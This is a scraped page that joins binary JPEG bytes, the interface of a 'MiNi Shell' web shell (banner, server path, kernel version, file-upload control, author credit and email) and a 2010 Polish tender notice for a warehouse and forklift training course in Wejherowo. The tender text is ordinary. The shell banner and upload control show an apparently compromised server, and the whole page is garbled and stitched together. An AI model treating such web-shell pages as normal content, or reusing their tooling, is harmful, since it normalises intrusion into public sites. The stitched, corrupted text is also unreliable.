JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100809/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100809/242606-N-2010.html

<p class="kh_header"><b>Wejherowo: Wykonanie usługi szkoleniowej Kurs magazynowo - handlowy z obsługą wózków jezdniowych</b><br>
<b>Numer ogłoszenia: 242606 - 2010; data zamieszczenia: 09.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Wejherowie , ul. I Brygady Pancernej Wojska Polskiego 32, 84-200 Wejherowo, woj. pomorskie, tel. 0-58 6776300, 6776327, faks 0-58 6776327.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pupwejherowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie usługi szkoleniowej Kurs magazynowo - handlowy z obsługą wózków jezdniowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie szkolenia grupowego dla 5 osób bezrobotnych w zakresie Kurs magazynowo - handlowy z obsługą wózków jezdniowych finansowanego z  Funduszu Pracy.
1. Program szkolenia powinien obejmować następujące zagadnienia:

OBSŁUGA PROGRAMU SUBIEKT:
PROGRAM SUBIEKT
Typowe mechanizmy:
- Tabela, Lista kontrahentów, Lista towarów i usług, Wyszukiwarka InsTYNKT, Typowe elementy okien, Typowe funkcje, Typowe skróty klawiszowe
Główne moduły:
- Kartoteka kontrahentów, Kartoteka towarów i usług, Dokumenty handlowe, Sprzedaż - faktury i rachunki, Zakupy - faktury i rachunki, Magazyn, Finanse, Zestawienia Administracja
- Podmiot, Magazyn, Kontrahenci, Personel, Urzędy skarbowe, Rachunki bankowe, Towary i usługi, Dokumenty, Kasy, Stawki VAT, Rabaty, Formy płatności, Należności i zobowiązania, Odsetki, Kategorie, Grupy, Wydruki, Urządzenia fiskalne.
FAKTUROWANIE KOMPUTEROWE 
1) Faktury - zakres i zastosowanie
- faktura VAT i faktura korygująca,
- faktury wewnętrzne,
- faktury VAT RR, VAT UE, VAT MP, VAT marża, handlowe.
2) Elementy obowiązkowe faktury.
3) Zasady wystawiania faktur.
4) Nierzetelność faktury - kiedy przestępstwo z Kodeksu Karno-Skarbowego.
5) Faktura korygująca a nota korygująca - różnice i zastosowanie.
6) Faktura przy zaliczce.
7) Faktury - wystawianie elektronicznie.
8) Faktury wystawione przez przedstawiciela podatkowego.
9) Dowody mające wpływ na stawkę opodatkowania podatkiem VAT (O% lub 22%).
10) Klasyfikacja statystyczna ważnym elementem faktury.
11) Czy warto podpisywać faktury?.
12) Praktyczne obowiązki wystawiających faktury.
13) Praktyczne obowiązki osób księgujących faktury.      

ZASADY GOSPODARKI MAGAZYNOWEJ:
1) Organizacja prac magazynowych w przedsiębiorstwie (przyjęcie, składowanie, kompletacja, wydanie).
2) Manipulacje materiałami i pakowanie:
- Manipulacje materiałami,
- Podział sprzętu do manipulacji materiałami ze względu na jego konstrukcję,
- Kryteria wyboru sprzętu do manipulacji materiałami,
- Opakowanie,
- Opakowania - wymogi projektowe,
- Kody kreskowe,
- Konteneryzacja,
- Koncepcja systemu informacji logistycznej.      

TECHNOLOGIE PRAC MAGAZYNOWYCH:
1) Charakterystyka technologicznego procesu magazynowania.
2) Proces magazynowy (czynność przyjęcia towarów do magazynu).
3) Zasady i kryteria ustalenia miejsc składowania.
4) Procedury i dokumenty dostawy.
5) Proces magazynowy - czynności kompletacji i wydania z magazynu, a w nim: określenie ścieżki kompletacyjnej jedno i dwustopniowej, określenie zasad 
i miejsc grupowania asortymentów według zleceń wydania, przepakowania 
i zabezpieczenia asortymentów do wysyłki, załadunku i wysyłki do odbiorców.  

BHP NA STANOWISKU MAGAZYNIERA,  PODSTAWOWE ZASADY HIGIENY:
1) Wybrane regulacje prawne z zakresu prawa pracy dotyczące bezpieczeństwa 
i higieny pracy, z omówieniem źródeł prawa międzynarodowego.
2) Interpretacja, analiza i ocena zagrożeń czynnikami szkodliwymi dla zdrowia, uciążliwymi i niebezpiecznymi oraz ocena ryzyka związanego z tymi zagrożeniami.
3) Organizacja i metody kształtowania bezpiecznych i higienicznych warunków pracy z uwzględnieniem stanowisk wyposażonych w monitory ekranowe, zarządzanie bezpieczeństwem i higiena pracy.
4) Analiza okoliczności i przyczyn wypadków przy pracy i chorób zawodowych oraz związana z nimi profilaktyka; omówienie przyczyn charakterystycznych wypadków przy pracy ze szczególnym uwzględnieniem wypadków powstałych na skutek niewłaściwej organizacji pracy oraz związanej z nimi profilaktyki.
5) Organizacja i metodyka szkolenia w zakresie bezpieczeństwa i higieny pracy 
(z uwzględnieniem metod prowadzenia instruktażu stanowiskowego) oraz kształtowanie bezpiecznych zachowań pracowników w procesach pracy.
6) Zasady postępowania w razie wypadku w czasie pracy i w sytuacjach zagrożeń, w tym zasady udzielania pierwszej pomocy.
7) Skutki ekonomiczne niewłaściwych warunków pracy (świadczenia 
z tytułu warunków pracy, składka na ubezpieczenia społeczne pracowników).
8) Problemy ochrony przeciwpożarowej i ochrony środowiska naturalnego.
9) Bezpieczeństwo i jakość zdrowotna żywności w świetle przepisów krajowych 
i przepisy Unii Europejskiej: (Harmonizacja przepisów, Podstawowe przepisy dot. warunków zdrowotnych żywności, Podstawowe definicje ustawowe, Pojęcie bezpieczeństwa zdrowotnego, Wymagania w stosunku do podmiotów branży żywnościowej).
10) Rodzaje zagrożeń w produkcji i obrocie żywnością: (Zagrożenie a ryzyko, Zagrożenie mikrobiologiczne, Zagrożenia chemiczne, Zagrożenia fizyczne, Sposoby zapobiegania i eliminacji zagrożeń).
11) Zasady dobrej praktyki higienicznej - dobrej praktyki produkcyjnej GMP/GHP: 
(Wymogi, Dokumentacja, Zasady opracowywania instrukcji i formularzy)
- Kontrola wewnętrzna: (Rola i podstawowe zasady kontroli wewnętrznej, Elementy samokontroli).  

GOSPODARKA ZAPASAMI:
1) Znaczenie zapasów.
2) Przyczyny utrzymywania zapasów.
3) Koszty zapasów.
4) Klasyfikacja zapasów.
5) Podejmowanie decyzji dotyczących zarządzania zapasami:
a) podstawowe decyzje w zarządzaniu zapasami,
b) metoda stałej wielkości zamówienia przy znanym i pewnym popycie,
c) metoda stałej wielkości zamówienia przy niepewnym (nieokreślonym) popycie,
d) metoda stałego okresu zamawiania,
e) tradycyjne metody zarządzania zapasami.

INWENTARYZACJA STANÓW MAGAZYNOWYCH:
1) Pobranie aktualnych stanów magazynowych.
2) Wydruk spisu z natury dla komisji inwentaryzacyjnej.
3) Wprowadzenie ilości spisanych przez komisję do programu.
4) Aktualizacja stanów magazynowych.
5) Wydruk remanentu.
6) Rodzaje inwentaryzacji:
a) inwentaryzacja ręczna,
b) inwentaryzacja elektroniczna prowadzona przy pomocy inwentaryzatora.    

CELE, ZADANIA I  WYPOSAŻENIE MAGAZYNU:
1) Wymagania dotyczące obiektu magazynowego wynikające z warunków   przechowywania.
2) Urządzenia do składowania: (regały ramowe do ręcznej obsługi, regały ramowe paletowe, regały do materiałów o większych wymiarach, regały zblokowane (wjezdne), regały przepływowe, regały przejezdne, regały okrężne, regały specjalne stojaki, wieszaki, podkłady).
3) Środki transportu: (wózki naładowne, wózki unoszące, wózki ciągnikowe, wózki podnośnikowe, automatyczne wózki jezdniowe, układnice, żurawie, wciągniki, suwnice, przenośniki, manipulatory).
4) Pomocnicze urządzenia magazynowe: (pojemniki, palety, kontenery, paletyzatory, depaletyzatory, pomosty, czytniki kodów, waga, urządzenia 
do zarządzania i łączności, urządzenia do tamowania).
5) Funkcje magazynu.
6) Rodzaje magazynów. 

OBSŁUGA WÓZKA JEZDNIOWEGO:
1) Podział i charakterystyka wózków jezdniowych na typy, odmiany.
2) Budowa i wyposażenie wózka jezdniowego.
3) Czynności operatora przy obsłudze wózka jezdniowego.
4) Klasyfikacja transportu wewnątrzzakładowego.
5) Przepisy przepisów ruchu drogowego przy kierowaniu wózkiem jezdniowym.
6) Organizowanie pracy wózkiem jezdniowym oraz załadunku.
7) Bezpieczeństwo i higiena pracy przy eksploatacji wózków jezdniowych.
8) Urządzenia do uruchamiania i kierowania wózkiem jezdniowym.
9) Trasa wózka oraz czynności związane z manewrami.
10) Wykonywanie manewrów wózkiem jezdniowym bez ładunku.
11) Wykonywanie manewrów wózkiem jezdniowym z ładunkiem.
12) Wykonywanie manewrów wózkiem jezdniowym na wzniesieniu z obciążeniem.
13) Wykonywanie manewrów wózkiem jezdniowym z osprzętem.

OBSŁUGA KASY FISKALNEJ:
1) Podstawy prawne wprowadzania i użytkowania kas rejestrujących.
2) Budowa i rodzaje kas rejestrujących.
3) Dokumenty (raporty) fiskalne wydawane przez kasy rejestrujące.
4) Organy i podmioty uprawniane do kontroli, sprawdzania i naprawiania kas rejestrujących.
5) Ćwiczenia praktyczne w zakresie obsługi kas rejestrujących..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówienia uzupełniającego do 50% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykazanie spełniania warunku nastąpi poprzez złożenie Załącznika nr 3 do SIWZ. Ocena spełnienia warunku zostanie dokonana metodą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykazanie spełniania warunku nastąpi poprzez złożenie Załącznika nr 3 do SIWZ oraz złożenie wraz z ofertą wykazu wykonanych usług w okresie ostatnich trzech lat w zakresie objętym specyfikacją. Ocena spełnienia warunku zostanie dokonana metodą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykazanie spełniania warunku nastąpi poprzez złożenie Załącznika nr 3 do SIWZ. Ocena spełnienia warunku zostanie dokonana metodą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykazanie spełniania warunku nastąpi poprzez złożenie Załącznika nr 3 do SIWZ oraz złożenie wraz z ofertą wykazu osób - kadry dydaktycznej, która będzie uczestniczyć w wykonywaniu zamówienia. Ocena spełnienia warunku zostanie dokonana metodą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykazanie spełniania warunku nastąpi poprzez złożenie Załącznika nr 3 do SIWZ. Ocena spełnienia warunku zostanie dokonana metodą spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Kwalifikacje kadry dydaktycznej - 30</li>
<li>3 - Doświadczenie Wykonawcy w realizacji szkoleń objętych zamówieniem - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ust. 1 ustawy Prawo zamówień publicznych na uzasadniony wniosek Zamawiającego, przewiduje się możliwość dokonania zmian w umowie 
dot. zmniejszenia liczby uczestników szkolenia w przypadku wystąpienia okoliczności niezależnych i niezawinionych przez Zamawiającego, których nie
można było przewidzieć w chwili zawarcia umowy, a powodujących, że wykonanie zamówienia nie jest możliwe w liczbie określonej przez Wykonawcę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pupwejherowo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy
ul. I Brygady Pancernej WP 32
84-200 Wejherowo
pokój nr 201.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.08.2010 godzina 09:00, miejsce: Powiatowy Urząd Pracy
ul. I Brygady Pancernej WP 32
84-200 Wejherowo
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com